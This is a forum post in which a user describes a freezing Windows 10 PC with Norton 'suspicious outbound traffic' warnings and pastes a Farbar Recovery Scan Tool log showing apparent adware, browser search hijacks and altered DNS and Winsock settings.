
Slow computer, Norton notification says " suspicious outbound traf



#1
LLL31


My computer is freezing up briefly whenever new pages are opened. Occasionally I get a message that I have "suspicious outbound traffic" from Norton, and a popup that says my graphic driver has failed and restored itself. Please help.

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (08-03-2016 17:33:26)
Running from C:\Users\levilaing\Downloads
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10586.113_none_7689896a26389b16\TiWorker.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
() C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
(Microsoft Corporation) C:\Windows\System32\LockAppHost.exe
() C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [BrowserPlugInHelper] => C:\Program Files (x86)\Wondershare\VideoConverterFree\BrowserPlugInHelper.exe [1969440 2013-06-18] ()
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Keyword.URL: hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=282369&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\norton-safe-search.xml [2016-01-13]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\smod.xml [2015-12-18]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\yahoo_ff.xml [2014-07-31]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\youtube-video-search.xml [2015-08-20]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-06-02]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension  - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (McAfee Security Scan+) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\bopakagnckmlgajfccecajhnimjiiedh [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
